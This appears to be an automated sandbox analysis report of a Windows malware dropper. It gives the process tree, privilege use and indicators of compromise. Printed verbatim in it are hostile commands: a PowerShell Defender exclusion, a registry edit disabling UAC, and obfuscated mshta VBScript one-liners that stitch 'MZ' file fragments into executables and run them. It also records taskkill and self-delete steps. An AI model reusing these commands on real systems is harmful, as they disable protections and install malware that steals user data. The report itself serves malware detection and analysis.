cYUc7wuTDsuE7h7XbhShNkR8.exe Token: SeRestorePrivilege 5308 WerFault.exe Token: SeBackupPrivilege 5308 WerFault.exe Token: SeDebugPrivilege 4120 7406868.scr Token: SeDebugPrivilege 2400 Mon209c830507d573.exe Token: SeCreateTokenPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeAssignPrimaryTokenPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeLockMemoryPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeIncreaseQuotaPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeMachineAccountPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeTcbPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeSecurityPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeTakeOwnershipPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeLoadDriverPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeSystemProfilePrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeSystemtimePrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeProfSingleProcessPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeIncBasePriorityPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeCreatePagefilePrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeCreatePermanentPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeBackupPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeRestorePrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeShutdownPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeDebugPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeAuditPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeSystemEnvironmentPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeChangeNotifyPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeRemoteShutdownPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeUndockPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeSyncAgentPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeEnableDelegationPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeManageVolumePrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeImpersonatePrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeCreateGlobalPrivilege 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: 31 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: 32 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: 33 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: 34 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: 35 5652 WkcWFH3P8gRGZgykU0ledS3T.exe Token: SeDebugPrivilege 2260 H86qWBuHzWZmGITuNE3X9SxF.exe Token: SeDebugPrivilege 5772 2512986.scr Token: SeShutdownPrivilege 2216 svchost.exe Token: SeCreatePagefilePrivilege 2216 svchost.exe Token: SeShutdownPrivilege 2216 svchost.exe Token: SeCreatePagefilePrivilege 2216 svchost.exe Token: SeDebugPrivilege 6044 taskkill.exe Token: SeDebugPrivilege 4852 2303097.scr Token: SeShutdownPrivilege 2216 svchost.exe Token: SeCreatePagefilePrivilege 2216 svchost.exe Token: SeDebugPrivilege 1652 5472694.scr Token: SeDebugPrivilege 6304 hQVevJHT7ifZkZy5q0HwRySe.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
setup.tmpCalculator%20Installation.exeinstaller.exemsedge.exepid Process 5720 setup.tmp 17176 Calculator%20Installation.exe 17296 installer.exe 6308 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 4852 wrote to memory of 1108 4852 setup_x86_x64_install.exe 84 PID 4852 wrote to memory of 1108 4852 setup_x86_x64_install.exe 84 PID 4852 wrote to memory of 1108 4852 setup_x86_x64_install.exe 84 PID 1108 wrote to memory of 1896 1108 setup_installer.exe 85 PID 1108 wrote to memory of 1896 1108 setup_installer.exe 85 PID 1108 wrote to memory of 1896 1108 setup_installer.exe 85 PID 1896 wrote to memory of 1300 1896 setup_install.exe 89 PID 1896 wrote to memory of 1300 1896 setup_install.exe 89 PID 1896 wrote to memory of 1300 1896 setup_install.exe 89 PID 1300 wrote to memory of 1524 1300 cmd.exe 90 PID 1300 wrote to memory of 1524 1300 cmd.exe 90 PID 1300 wrote to memory of 1524 1300 cmd.exe 90 PID 1896 wrote to memory of 1464 1896 setup_install.exe 91 PID 1896 wrote to memory of 1464 1896 setup_install.exe 91 PID 1896 wrote to memory of 1464 1896 setup_install.exe 91 PID 1896 wrote to memory of 1356 1896 setup_install.exe 92 PID 1896 wrote to memory of 1356 1896 setup_install.exe 92 PID 1896 wrote to memory of 1356 1896 setup_install.exe 92 PID 1896 wrote to memory of 4900 1896 setup_install.exe 93 PID 1896 wrote to memory of 4900 1896 setup_install.exe 93 PID 1896 wrote to memory of 4900 1896 setup_install.exe 93 PID 1896 wrote to memory of 2940 1896 setup_install.exe 95 PID 1896 wrote to memory of 2940 1896 setup_install.exe 95 PID 1896 wrote to memory of 2940 1896 setup_install.exe 95 PID 1896 wrote to memory of 1904 1896 setup_install.exe 94 PID 1896 wrote to memory of 1904 1896 setup_install.exe 94 PID 1896 wrote to memory of 1904 1896 setup_install.exe 94 PID 2940 wrote to memory of 2200 2940 cmd.exe 107 PID 2940 wrote to memory of 2200 2940 cmd.exe 107 PID 2940 wrote to memory of 2200 2940 cmd.exe 107 PID 1896 wrote to memory of 4760 1896 setup_install.exe 106 PID 1896 wrote to memory of 4760 1896 setup_install.exe 106 PID 1896 wrote to memory of 4760 1896 setup_install.exe 106 PID 1896 wrote to memory of 1720 1896 setup_install.exe 96 PID 1896 wrote to memory of 1720 1896 setup_install.exe 96 PID 1896 wrote to memory of 1720 1896 setup_install.exe 96 PID 1896 wrote to memory of 2232 1896 setup_install.exe 105 PID 1896 wrote to memory of 2232 1896 setup_install.exe 105 PID 1896 wrote to memory of 2232 1896 setup_install.exe 105 PID 1896 wrote to memory of 2740 1896 setup_install.exe 97 PID 1896 wrote to memory of 2740 1896 setup_install.exe 97 PID 1896 wrote to memory of 2740 1896 setup_install.exe 97 PID 1896 wrote to memory of 4484 1896 setup_install.exe 98 PID 1896 wrote to memory of 4484 1896 setup_install.exe 98 PID 1896 wrote to memory of 4484 1896 setup_install.exe 98 PID 1464 wrote to memory of 3440 1464 cmd.exe 99 PID 1464 wrote to memory of 3440 1464 cmd.exe 99 PID 1464 wrote to memory of 3440 1464 cmd.exe 99 PID 1896 wrote to memory of 2796 1896 setup_install.exe 103 PID 1896 wrote to memory of 2796 1896 setup_install.exe 103 PID 1896 wrote to memory of 2796 1896 setup_install.exe 103 PID 4900 wrote to memory of 1668 4900 cmd.exe 102 PID 4900 wrote to memory of 1668 4900 cmd.exe 102 PID 4900 wrote to memory of 1668 4900 cmd.exe 102 PID 1356 wrote to memory of 2912 1356 cmd.exe 100 PID 1356 wrote to memory of 2912 1356 cmd.exe 100 PID 1356 wrote to memory of 2912 1356 cmd.exe 100 PID 4760 wrote to memory of 3168 4760 cmd.exe 101 PID 4760 wrote to memory of 3168 4760 cmd.exe 101 PID 1904 wrote to memory of 2992 1904 cmd.exe 104 PID 1904 wrote to memory of 2992 1904 cmd.exe 104 PID 1904 wrote to memory of 2992 1904 cmd.exe 104 PID 1720 wrote to memory of 920 1720 cmd.exe 112 PID 1720 wrote to memory of 920 1720 cmd.exe 112 -
System policy modification 1 TTPs 1 IoCs
Processes:
hQVevJHT7ifZkZy5q0HwRySe.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hQVevJHT7ifZkZy5q0HwRySe.exe -
outlook_office_path 1 IoCs
Processes:
rv0IoLjCTiAVqq_ZvgumHf0K.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe -
outlook_win_path 1 IoCs
Processes:
rv0IoLjCTiAVqq_ZvgumHf0K.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rv0IoLjCTiAVqq_ZvgumHf0K.exe
Processes
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.21⤵
- Modifies data under HKEY_USERS
PID:4172
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv c4QZvIvDlEangE8xJGiw+w.01⤵PID:4808
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv c4QZvIvDlEangE8xJGiw+w.0.22⤵PID:5300
-
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS454469E3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
PID:3440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵
- Executes dropped EXE
PID:2912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5356
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exe6⤵
- Executes dropped EXE
PID:2896
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
- Executes dropped EXE
PID:2992 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:3980
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe") do taskkill /F -Im "%~NxU"7⤵PID:436
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
PID:3720 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:4036
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2044
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵
- Suspicious use of SetThreadContext
PID:1668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:504
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:5496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:4244
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:5948
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
- Loads dropped DLL
PID:2068 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:2944
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
- Loads dropped DLL
PID:6064
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
PID:2200 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 2806⤵
- Program crash
PID:5396
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exeMon209c830507d573.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:920 -
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵PID:2740
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20d3b8b752.exeMon20d3b8b752.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:976 -
C:\Users\Admin\Pictures\Adobe Films\04JJ3RxmoOrkjUmTE75tZicJ.exe"C:\Users\Admin\Pictures\Adobe Films\04JJ3RxmoOrkjUmTE75tZicJ.exe"6⤵
- Executes dropped EXE
PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\r0qEA6ZNISqo0Tq09aQk8H2C.exe"C:\Users\Admin\Pictures\Adobe Films\r0qEA6ZNISqo0Tq09aQk8H2C.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5528
-
-
C:\Users\Admin\Pictures\Adobe Films\qvgjxjaIyEOYZSsKaNkUA6BG.exe"C:\Users\Admin\Pictures\Adobe Films\qvgjxjaIyEOYZSsKaNkUA6BG.exe"6⤵
- Executes dropped EXE
PID:5388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5316
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe"C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2260 -
C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe"H86qWBuHzWZmGITuNE3X9SxF.exe"7⤵
- Executes dropped EXE
PID:3504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1488⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5568
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:5352 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"7⤵PID:504
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:6240
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WkcWFH3P8gRGZgykU0ledS3T.exe"C:\Users\Admin\Pictures\Adobe Films\WkcWFH3P8gRGZgykU0ledS3T.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5652 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 19367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6976
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kcqx8N9nfA3k0vDFYVlSf29e.exe"C:\Users\Admin\Pictures\Adobe Films\kcqx8N9nfA3k0vDFYVlSf29e.exe"6⤵
- Executes dropped EXE
PID:1176 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7100
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5396 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )7⤵PID:6084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe" ) do taskkill -iM "%~NXI" -f8⤵PID:5180
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "cYUc7wuTDsuE7h7XbhShNkR8.exe" -f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu029⤵PID:2036
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )10⤵PID:5660
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f11⤵PID:6352
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScripT: clOse(cREaTeObJECT( "wscRIPt.SHELL" ).rUN( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0, trUE ))10⤵PID:5648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 &COpY /b /Y 9YM~jXrX.Lb3+OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE +qDrS.CQ~+ U78WYSY.oFM +f36Uy3.T ..\bJUC.L& DEl /q *&STArt msiexec.exe /Y ..\bjUC.l11⤵PID:6300
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"12⤵PID:5284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5908
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\bjUC.l12⤵
- Loads dropped DLL
PID:7136
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H8jw_4TmnGzyEx6PHssgdCoy.exe"C:\Users\Admin\Pictures\Adobe Films\H8jw_4TmnGzyEx6PHssgdCoy.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3208 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
PID:660 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"8⤵
- Loads dropped DLL
PID:6968 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff8e63fdec0,0x7ff8e63fded0,0x7ff8e63fdee09⤵
- Loads dropped DLL
PID:7032
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --mojo-platform-channel-handle=1888 /prefetch:89⤵
- Loads dropped DLL
PID:8256
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:29⤵
- Loads dropped DLL
PID:8220
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --mojo-platform-channel-handle=2264 /prefetch:89⤵
- Loads dropped DLL
PID:8308
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lbbD1Mb94469URLfxW1wrRWT.exe"C:\Users\Admin\Pictures\Adobe Films\lbbD1Mb94469URLfxW1wrRWT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6000
-
-
C:\Users\Admin\Pictures\Adobe Films\WzMNlEBCfd7fUc9yVHJGL8mN.exe"C:\Users\Admin\Pictures\Adobe Films\WzMNlEBCfd7fUc9yVHJGL8mN.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4960
-
-
